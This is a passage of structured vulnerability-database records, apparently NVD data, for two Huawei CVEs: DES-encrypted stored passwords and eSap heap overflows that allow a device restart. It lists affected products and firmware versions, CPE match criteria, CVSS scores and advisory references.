                     criteria: "cpe:2.3:h:huawei:s3300hi:v200r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "6D5FE313-7374-4D7A-9A01-F389311710C5",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s3700:v100r005:*:*:*:*:*:*:*",
                     matchCriteriaId: "7EF096DC-B6F4-4763-AC6B-72CB46AB1976",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s3700:v100r006:*:*:*:*:*:*:*",
                     matchCriteriaId: "D1171FC3-5A2E-40C6-85FF-AF7E78F96C87",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s3700:v200r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "A706C2B0-5E15-4C90-910F-0ABB65573C93",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s5300:v100r002:*:*:*:*:*:*:*",
                     matchCriteriaId: "2295584A-2664-45AE-BA0C-1B0411F29A13",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s5300:v100r003:*:*:*:*:*:*:*",
                     matchCriteriaId: "DDA542A3-7BB3-42B6-ACBB-D00AD4AD707A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s5300:v100r005:*:*:*:*:*:*:*",
                     matchCriteriaId: "5361C4C5-BBC5-42FE-A575-985B57EF575E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s5300:v100r006:*:*:*:*:*:*:*",
                     matchCriteriaId: "75A90C9F-8DAE-45B4-BB78-6080A434E5FC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s5300hi:v100r006:*:*:*:*:*:*:*",
                     matchCriteriaId: "175A8714-CD80-472B-9507-829EBC59B805",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s5300hi:v200r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "81195EA9-D62B-492D-AA37-EF7AD17AED7C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s5306:v100r006:*:*:*:*:*:*:*",
                     matchCriteriaId: "47052A6F-E532-42B6-9B4B-46424A1F6377",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s5306:v200r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "8B22E5AB-DAF6-4020-A62E-BE6FBE57D3DA",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s5700:v100r005:*:*:*:*:*:*:*",
                     matchCriteriaId: "3C178B6F-8608-4BBE-A8D8-8798FB1D75E7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s5700:v100r006:*:*:*:*:*:*:*",
                     matchCriteriaId: "29CAD535-0216-4048-BFDA-863AA5425BA9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s5700:v200r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "9424F3B6-A280-4043-A670-3768D9515631",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s6300:v100r006:*:*:*:*:*:*:*",
                     matchCriteriaId: "4FB869CD-37F8-4E77-8065-B9C8FADED40C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s6300:v200r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "C22B5DE3-03ED-4ED4-BD86-278197FA3FC4",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s6700:v100r006:*:*:*:*:*:*:*",
                     matchCriteriaId: "652F2CCF-41FE-4DEC-8179-FF285AB99E52",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s6700:v200r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "66149AA8-E897-4563-97EC-C5EDCDBE072B",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s7700:v100r003:*:*:*:*:*:*:*",
                     matchCriteriaId: "0B3F7637-0B4C-40D0-B814-B19F10118795",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s7700:v100r006:*:*:*:*:*:*:*",
                     matchCriteriaId: "04686A95-05CF-4ACC-89E5-2140DFC423F7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s9300:v100r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "63BB797D-2C82-4A55-A26A-61A6C1C86888",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s9300:v100r002:*:*:*:*:*:*:*",
                     matchCriteriaId: "465F6E51-0676-4443-9122-CB2AD59C7516",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s9300:v100r003:*:*:*:*:*:*:*",
                     matchCriteriaId: "94970073-415B-4358-833F-CC220653376D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s9300:v100r006:*:*:*:*:*:*:*",
                     matchCriteriaId: "F26E31D2-31F8-4D4F-AD3A-44C59B22B121",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:svn2000:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "59513736-11B7-47E6-B5C4-D33F9E032BEC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:svn3000:v100r002c02spc802b041:*:*:*:*:*:*:*",
                     matchCriteriaId: "931A86E3-43C1-4C72-8425-862C33A2DBA7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:svn5000:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "15EBA968-C3E0-430E-944D-B4DA30B932C6",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:svn5300:v100r001c01b019:*:*:*:*:*:*:*",
                     matchCriteriaId: "17A15567-DC96-4513-8681-93CE26B4FA07",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:wlan_ac_6605:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "1968B0D3-1653-459A-865D-79DBB9AADEE6",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:wlan_ac_6605:v200r001c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "7490231F-7FAB-4875-812F-657B7BF4F136",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "The Huawei NE5000E, MA5200G, NE40E, NE80E, ATN, NE40, NE80, NE20E-X6, NE20, ME60, CX600, CX200, CX300, ACU, WLAN AC 6605, S9300, S7700, S2300, S3300, S5300, S3300HI, S5300HI, S5306, S6300, S2700, S3700, S5700, S6700, AR G3, H3C AR(OEM IN), AR 19, AR 29, AR 49, Eudemon100E, Eudemon200, Eudemon300, Eudemon500, Eudemon1000, Eudemon1000E-U/USG5300, Eudemon1000E-X/USG5500, Eudemon8080E/USG9300, Eudemon8160E/USG9300, Eudemon8000E-X/USG9500, E200E-C/USG2200, E200E-X3/USG2200, E200E-X5/USG2200, E200E-X7/USG2200, E200E-C/USG5100, E200E-X3/USG5100, E200E-X5/USG5100, E200E-X7/USG5100, E200E-B/USG2100, E200E-X1/USG2100, E200E-X2/USG2100, SVN5300, SVN2000, SVN5000, SVN3000, NIP100, NIP200, NIP1000, NIP2100, NIP2200, and NIP5100 use the DES algorithm for stored passwords, which makes it easier for context-dependent attackers to obtain cleartext passwords via a brute-force attack.",
      },
      {
         lang: "es",
         value: "Los Huawei NE5000E, MA5200G, NE40E, NE80E, ATN, NE40, NE80, NE20E-X6, NE20, ME60, CX600, CX200, CX300, ACU, WLAN AC 6605, S9300, S7700, S2300, S3300, S5300, S3300HI, S5300HI, S5306, S6300, S2700, S3700, S5700, S6700, AR G3, H3C AR(OEM IN), AR 19, AR 29, AR 49, Eudemon100E, Eudemon200, Eudemon300, Eudemon500, Eudemon1000, Eudemon1000E-U/USG5300, Eudemon1000E-X/USG5500, Eudemon8080E/USG9300, Eudemon8160E/USG9300, Eudemon8000E-X/USG9500, E200E-C/USG2200, E200E-X3/USG2200, E200E-X5/USG2200, E200E-X7/USG2200, E200E-C/USG5100, E200E-X3/USG5100, E200E-X5/USG5100, E200E-X7/USG5100, E200E-B/USG2100, E200E-X1/USG2100, E200E-X2/USG2100, SVN5300, SVN2000, SVN5000, SVN3000, NIP100, NIP200, NIP1000, NIP2100, NIP2200, y NIP5100 utiliza el algoritmo DES para las contraseñas almacenados, lo que hace que sea más fácil para los atacantes dependientes de contexto obtener contraseñas de texto simple a través de un ataque de fuerza bruta.",
      },
   ],
   id: "CVE-2012-4960",
   lastModified: "2025-04-11T00:51:21.963",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "MEDIUM",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "SINGLE",
               availabilityImpact: "PARTIAL",
               baseScore: 6.5,
               confidentialityImpact: "PARTIAL",
               integrityImpact: "PARTIAL",
               vectorString: "AV:N/AC:L/Au:S/C:P/I:P/A:P",
               version: "2.0",
            },
            exploitabilityScore: 8,
            impactScore: 6.4,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
   },
   published: "2013-06-20T15:55:00.897",
   references: [
      {
         source: "cret@cert.org",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-u_194373.htm",
      },
      {
         source: "cret@cert.org",
         tags: [
            "US Government Resource",
         ],
         url: "http://www.kb.cert.org/vuls/id/948096",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-u_194373.htm",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "US Government Resource",
         ],
         url: "http://www.kb.cert.org/vuls/id/948096",
      },
   ],
   sourceIdentifier: "cret@cert.org",
   vulnStatus: "Deferred",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-310",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2018-01-30 17:29
Modified
2024-11-21 02:10
Summary
Multiple heap-based buffer overflows in the eSap software platform in Huawei Campus S9300, S7700, S9700, S5300, S5700, S6300, and S6700 series switches; AR150, AR160, AR200, AR1200, AR2200, AR3200, AR530, NetEngine16EX, SRG1300, SRG2300, and SRG3300 series routers; and WLAN AC6005, AC6605, and ACU2 access controllers allow remote attackers to cause a denial of service (device restart) via a crafted length field in a packet.
Impacted products
Vendor Product Version
huawei s9300_firmware v200r001c00spc300
huawei s9300_firmware v200r002c00spc100
huawei s9300_firmware v200r003c00spc500
huawei s9300 -
huawei s9700_firmware v200r001c00spc300
huawei s9700_firmware v200r002c00spc100
huawei s9700_firmware v200r003c00spc500
huawei s9700 -
huawei s7700_firmware v200r001c00spc300
huawei s7700_firmware v200r002c00spc100
huawei s7700_firmware v200r003c00spc500
huawei s7700 -
huawei s5300_firmware v200r001c00spc300
huawei s5300_firmware v200r002c00spc100
huawei s5300_firmware v200r003c00spc300
huawei s5300 -
huawei s5700_firmware v200r001c00spc300
huawei s5700_firmware v200r002c00spc100
huawei s5700_firmware v200r003c00spc300
huawei s5700 -
huawei s6300_firmware v200r001c00spc300
huawei s6300_firmware v200r002c00spc100
huawei s6300_firmware v200r003c00spc300
huawei s6300 -
huawei s6700_firmware v200r001c00spc300
huawei s6700_firmware v200r002c00spc100
huawei s6700_firmware v200r003c00spc300
huawei s6700 -
huawei ar150_firmware v200r003c00spc100
huawei ar150_firmware v200r003c00spc200
huawei ar150_firmware v200r003c01spc100
huawei ar150_firmware v200r003c01spc300
huawei ar150_firmware v200r003c01spc900
huawei ar150_firmware v200r005c00spc100
huawei ar150_firmware v200r005c00spc200
huawei ar150 -
huawei ar160_firmware v200r003c00spc100
huawei ar160_firmware v200r003c00spc200
huawei ar160_firmware v200r003c01spc100
huawei ar160_firmware v200r003c01spc300
huawei ar160_firmware v200r003c01spc900
huawei ar160_firmware v200r005c00spc100
huawei ar160_firmware v200r005c00spc200
huawei ar160 -
huawei ar200_firmware v200r003c00spc100
huawei ar200_firmware v200r003c00spc200
huawei ar200_firmware v200r003c01spc100
huawei ar200_firmware v200r003c01spc300
huawei ar200_firmware v200r003c01spc900
huawei ar200_firmware v200r005c00spc100
huawei ar200_firmware v200r005c00spc200
huawei ar200 -
huawei ar1200_firmware v200r003c00spc100
huawei ar1200_firmware v200r003c00spc200
huawei ar1200_firmware v200r003c01spc100
huawei ar1200_firmware v200r003c01spc300
huawei ar1200_firmware v200r003c01spc900
huawei ar1200_firmware v200r005c00spc100
huawei ar1200_firmware v200r005c00spc200
huawei ar1200 -
huawei ar2200_firmware v200r003c00spc100
huawei ar2200_firmware v200r003c00spc200
huawei ar2200_firmware v200r003c01spc100
huawei ar2200_firmware v200r003c01spc300
huawei ar2200_firmware v200r003c01spc900
huawei ar2200_firmware v200r005c00spc100
huawei ar2200_firmware v200r005c00spc200
huawei ar2200 -
huawei ar3200_firmware v200r003c00spc100
huawei ar3200_firmware v200r003c00spc200
huawei ar3200_firmware v200r003c01spc100
huawei ar3200_firmware v200r003c01spc300
huawei ar3200_firmware v200r003c01spc900
huawei ar3200_firmware v200r005c00spc100
huawei ar3200_firmware v200r005c00spc200
huawei ar3200 -
huawei ar530_firmware v200r003c00spc100
huawei ar530_firmware v200r003c00spc200
huawei ar530_firmware v200r003c01spc100
huawei ar530_firmware v200r003c01spc300
huawei ar530_firmware v200r003c01spc900
huawei ar530_firmware v200r005c00spc100
huawei ar530_firmware v200r005c00spc200
huawei ar530 -
huawei netengine16ex_firmware v200r003c00spc100
huawei netengine16ex_firmware v200r003c00spc200
huawei netengine16ex_firmware v200r003c01spc100
huawei netengine16ex_firmware v200r003c01spc300
huawei netengine16ex_firmware v200r003c01spc900
huawei netengine16ex_firmware v200r005c00spc100
huawei netengine16ex_firmware v200r005c00spc200
huawei netengine16ex -
huawei srg1300_firmware v200r003c00spc100
huawei srg1300_firmware v200r003c00spc200
huawei srg1300_firmware v200r003c01spc100
huawei srg1300_firmware v200r003c01spc300
huawei srg1300_firmware v200r003c01spc900
huawei srg1300_firmware v200r005c00spc100
huawei srg1300_firmware v200r005c00spc200
huawei srg1300 -
huawei srg2300_firmware v200r003c00spc100
huawei srg2300_firmware v200r003c00spc200
huawei srg2300_firmware v200r003c01spc100
huawei srg2300_firmware v200r003c01spc300
huawei srg2300_firmware v200r003c01spc900
huawei srg2300_firmware v200r005c00spc100
huawei srg2300_firmware v200r005c00spc200
huawei srg2300 -
huawei srg3300_firmware v200r003c00spc100
huawei srg3300_firmware v200r003c00spc200
huawei srg3300_firmware v200r003c01spc100
huawei srg3300_firmware v200r003c01spc300
huawei srg3300_firmware v200r003c01spc900
huawei srg3300_firmware v200r005c00spc100
huawei srg3300_firmware v200r005c00spc200
huawei srg3300 -
huawei wlan_ac6005_firmware v200r003c00spc100
huawei wlan_ac6005_firmware v200r003c00spc200
huawei wlan_ac6005_firmware v200r003c00spc300
huawei wlan_ac6005_firmware v200r003c00spc500
huawei wlan_ac6005_firmware v200r005c00spc100
huawei wlan_ac6005 -
huawei wlan_ac6605_firmware v200r003c00spc100
huawei wlan_ac6605_firmware v200r003c00spc200
huawei wlan_ac6605_firmware v200r003c00spc300
huawei wlan_ac6605_firmware v200r003c00spc500
huawei wlan_ac6605_firmware v200r005c00spc100
huawei wlan_ac6605 -
huawei wlan_acu2_firmware v200r005c00spc100
huawei wlan_acu2 -



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "2D1EF10E-F18B-4F3A-AA2B-25003183E19D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "72842130-3B3A-4FD8-8143-556F4048B456",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "78DA2DC7-63B3-40D7-BEC7-AF81066A2733",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AD2EC926-50C6-4CBE-BB6F-56F3A6287DEE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "E4EE71EF-90D8-40C6-9E80-A543ED32E976",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "F5C9C9CF-A5E1-4461-8B1E-1C572BB3D59A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "CBDBE325-B6F4-475F-B7F8-F3142F730039",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "75FAA4BF-1ED0-4059-ADA1-071AF1BF2882",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "07A44DEA-AB17-48F4-87C1-B3B6088BCD82",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "EEBEE7C8-0AB6-4BCE-A2C1-6A4CB4BF68AB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "5D0B5718-9465-476F-B2FA-FFC6FB08E354",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s7700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "8769C2C4-E333-432B-8943-CFDFAE013379",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "93E7A87E-E2FB-4852-9BE5-164822801822",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "647A8737-10F5-4008-8F68-BF8BE4319C56",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "9D07FB95-7CE7-480A-BF2D-87017EFAE038",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2CFEF08E-54C5-4D60-AFF0-37B00D6E2DDD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "121BEE57-945E-4368-8AE4-4A823D70D31C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "EBC629F6-BF42-4C2B-8CB1-2C4412C8D95A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "DEC329F7-D83F-4119-B8CA-CC819EC872CB",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "E22D3CFF-3353-4EE2-8933-84F395469D0D",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "7082EE3F-3174-42C2-B010-5078DC752D67",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "58578CA3-392E-4E6D-9B93-E57DC4F44237",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "2CB0108A-2462-45D6-8A82-8681E8167D6C",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AA3C8988-A1FC-4B04-9134-F2BDDADEAFB5",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "4AF84CB7-7EC9-4978-A4F6-FD5746AF1CE9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "AFFF09EB-AA08-4204-B028-182933EC9700",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "7D5033F0-7E4F-431A-B4EA-E5D5D1FCFE5E",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "DA7AC10D-B0DD-4206-8642-134DDD585C06",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:ar150_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "EEBE2B34-CF31-46BB-9901-5296B95FBFF3",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar150_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "38B23B80-2739-47ED-A579-A824236513D1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar150_firmware:v200r003c01spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "F93E6A51-0061-4C00-89E4-A29B9B84DE48",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar150_firmware:v200r003c01spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "3661E164-31AE-41A6-B234-0D057B345045",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar150_firmware:v200r003c01spc900:*:*:*:*:*:*:*",
                     matchCriteriaId: "872DA1C2-74D5-4CDD-8F7C-F090116DA894",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar150_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "4FC8C129-5D9E-4DF3-A678-748786F80174",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar150_firmware:v200r005c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "70AADC9F-B269-4854-BD0F-5B8AA399A232",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:ar150:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "526371A8-11FE-4D00-AFBB-8E867A320B27",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:ar160_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "FDF6DE13-0932-4347-8D32-19CC8BF4B785",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar160_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "2129467C-C154-4F05-AFA6-8FC8E4E35219",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar160_firmware:v200r003c01spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "630A1C03-EA2E-4A96-9EC1-B7B8E3002A0F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar160_firmware:v200r003c01spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "B675E367-481F-42C1-A485-ACA0B316D7DC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar160_firmware:v200r003c01spc900:*:*:*:*:*:*:*",
                     matchCriteriaId: "CD77CD84-CE15-4216-B5C5-ACD028AA4402",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar160_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "9C2EB57C-6032-4711-9EFA-91C626E79341",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar160_firmware:v200r005c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "4182C1FF-262A-421B-9024-AB8004256CDE",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:ar160:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "137A007D-A498-483F-8B4F-DCA118B25F11",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:ar200_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "6C6C7146-3416-43C8-A5B8-ED6C4FF80219",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar200_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "F1F36AFE-F13C-4954-87F4-7D1288D06F60",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar200_firmware:v200r003c01spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "222BEEB0-E420-453C-B73C-D53A9CD13683",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar200_firmware:v200r003c01spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "DE2BAF03-8BF9-442D-8776-458755F102C5",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar200_firmware:v200r003c01spc900:*:*:*:*:*:*:*",
                     matchCriteriaId: "4B6B91A0-35C2-4012-8386-13F4E196904E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar200_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "0B66285D-66E4-4374-AE1F-E2AC29BBA656",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar200_firmware:v200r005c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "91D25CC5-8EF8-41C2-ADAF-6F13125D3EC0",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:ar200:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2562CCF8-A4A7-4ACD-AA67-E3DB8B5ADA92",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:ar1200_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "EA9F9579-29D2-4C49-92B3-F8A3B6874E6A",
                     vulnerable: true,
                  },
                  {
